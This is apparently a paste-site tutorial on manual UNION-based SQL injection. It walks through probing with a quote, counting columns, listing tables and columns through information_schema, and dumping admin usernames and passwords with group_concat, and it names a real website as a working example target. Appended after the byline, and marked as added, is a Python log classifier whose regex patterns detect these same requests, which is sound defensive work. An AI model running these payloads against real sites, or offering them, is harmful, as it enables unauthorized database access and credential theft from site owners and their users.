Netikerty

Untitled

Feb 5th, 2013
How to Do a Manual SQL Injection

1.- Look for a vulnerable page, with dorks if you want. Example page: www.url.com/index.php?id=5'

If the page is vulnerable, it shows a message like this:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

But if the page is not vulnerable, it shows a 404 error or simply shows nothing.

2.- We need to know whether the page is vulnerable. For this we do the following:
a) Put a minus sign on the number from the vulnerability, like so:

www.url.com/index.php?id=-5 (you have to remove the ' sign, don't forget it)

b) At the same time, add +union+select+1,2,3,4,5,6,7,8,9--. You have to do this procedure little by little until the tables show. For example:

www.url.com/index.php?id=-5+union+select+1--
www.url.com/index.php?id=-5+union+select+1,2--
www.url.com/index.php?id=-5+union+select+1,2,3--
www.url.com/index.php?id=-5+union+select+1,2,3,4--
www.url.com/index.php?id=-5+union+select+1,2,3,4,5--
www.url.com/index.php?id=-5+union+select+1,2,3,4,5,6--
www.url.com/index.php?id=-5+union+select+1,2,3,4,5,6,7--
www.url.com/index.php?id=-5+union+select+1,2,3,4,5,6,7,8--
www.url.com/index.php?id=-5+union+select+1,2,3,4,5,6,7,8,9--

When you do it, the page will show the tables.

Example: http://www.cordobadm.com.ar/noticia.php?id=-19+union+select+1,2,3,4,5,6,7--

If the page doesn't show you the tables, it isn't vulnerable.

3.- When the tables show, select one. For example, if the web page shows the tables 4, 5 or 6, I select 4. Then I do the same thing, replacing the number with replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29 and putting +from+information_schema.tables-- at the end:

www.url.com/index.php?id=-5+union+select+1,2,3,replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29,5,6,7+from+information_schema.tables--

This shows the names of the tables. If it doesn't work with one number, test with another of the numbers shown before; but if there is only one, we'll need another way to get into this page.

4.- The next step is to select the name of a table and change the name to hexadecimal. For this we will use the following page: http://www.swingnote.com/tools/texttohex.php

For example, the page shows me a table whose name is "admin", so I go to the page and change admin to hexadecimal: admin=61646d696e

5.- After that we do the following step:
a) Erase the code we put in place of the number before and replace it with column_names, and at the end put the following code: columns+where(table_name=0xhere the hexadecimal name)limit+1,1--

www.url.com/index.php?id=-5+union+select+1,2,3,column_names,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e)limit+1,1-- (shows me user, for example)

b) Explore the table by changing the 1,1--. Example:
www.url.com/index.php?id=-5+union+select+1,2,3,column_names,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e)limit+2,1-- (shows me password, for example)

www.url.com/index.php?id=-5+union+select+1,2,3,column_names,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e)limit+3,1--

www.url.com/index.php?id=-5+union+select+1,2,3,column_names,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e)limit+4,1--

www.url.com/index.php?id=-5+union+select+1,2,3,column_names,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e)limit+5,1--

www.url.com/index.php?id=-5+union+select+1,2,3,column_names,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e)limit+6,1--

www.url.com/index.php?id=-5+union+select+1,2,3,column_names,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e)limit+7,1--

www.url.com/index.php?id=-5+union+select+1,2,3,column_names,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e)limit+8,1--

www.url.com/index.php?id=-5+union+select+1,2,3,column_names,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e)limit+9,1--

Until it shows all the necessary data.

6.- To reveal the columns we put the following code: group_concat(name from the table in 1,1--,0x3a,name from the other table result from exploring in the last step) and at the end put: +from+table name--
Example: Table name = admin; table result from the exploration = password

www.url.com/index.php?id=-5+union+select+1,2,3,group_concat(user,0x3a,password),5,6,7+from+admin--

Enjoy it ;)

By Netikerty Asenet
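
Seen from the server side, every request in the steps above leaves a recognisable line in the web access log. The following is an added example, not part of the original paste: a small log classifier that tags those request shapes and flags a client walking the numeric UNION list upward. The log lines, addresses, function names and signature names are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Patterns mirror the request shapes in the walkthrough; names are this example's own.
SIGNATURES = {
    "quote_probe": re.compile(r"=-?\d+'"),
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),
}
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')
NUMERIC_LIST = re.compile(r"union\s+select\s+(\d+(?:\s*,\s*\d+)*)\s*--", re.I)

def parse(line):
    """Return (client, decoded query string, status) or None for unparseable lines."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    return client, unquote_plus(target.partition("?")[2]), int(status)

def signatures(line):
    """Names of the signatures whose pattern occurs in the decoded query."""
    parsed = parse(line)
    if parsed is None:
        return []
    return sorted(n for n, rx in SIGNATURES.items() if rx.search(parsed[1]))

def column_sweeps(lines, min_steps=3):
    """Clients that sent >= min_steps numeric UNION lists of different lengths."""
    widths = defaultdict(set)
    for line in lines:
        parsed = parse(line)
        m = parsed and NUMERIC_LIST.search(parsed[1])
        if m:
            widths[parsed[0]].add(m.group(1).count(",") + 1)
    return {c: sorted(w) for c, w in widths.items() if len(w) >= min_steps}

# Constructed sample log lines (combined log format, documentation addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Feb/2013:10:00:01 +0000] "GET /index.php?id=5\' HTTP/1.1" 200 512',
    '203.0.113.7 - - [05/Feb/2013:10:00:09 +0000] "GET /index.php?id=-5+union+select+1-- HTTP/1.1" 200 498',
    '203.0.113.7 - - [05/Feb/2013:10:00:12 +0000] "GET /index.php?id=-5+union+select+1,2-- HTTP/1.1" 200 498',
    '203.0.113.7 - - [05/Feb/2013:10:00:15 +0000] "GET /index.php?id=-5+union+select+1,2,3-- HTTP/1.1" 200 731',
    '203.0.113.7 - - [05/Feb/2013:10:01:02 +0000] "GET /index.php?id=-5+union+select+1,2,3,replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29,5,6,7+from+information_schema.tables-- HTTP/1.1" 200 4096',
    '198.51.100.20 - - [05/Feb/2013:10:02:00 +0000] "GET /index.php?id=5 HTTP/1.1" 200 2048',
]
```

The query is URL-decoded before matching, so the %28/%29 and + encodings used in the steps above do not hide the keywords. A hit on these patterns in a log for a page whose id parameter should only ever be an integer is a reason to check that the query behind it is parameterized.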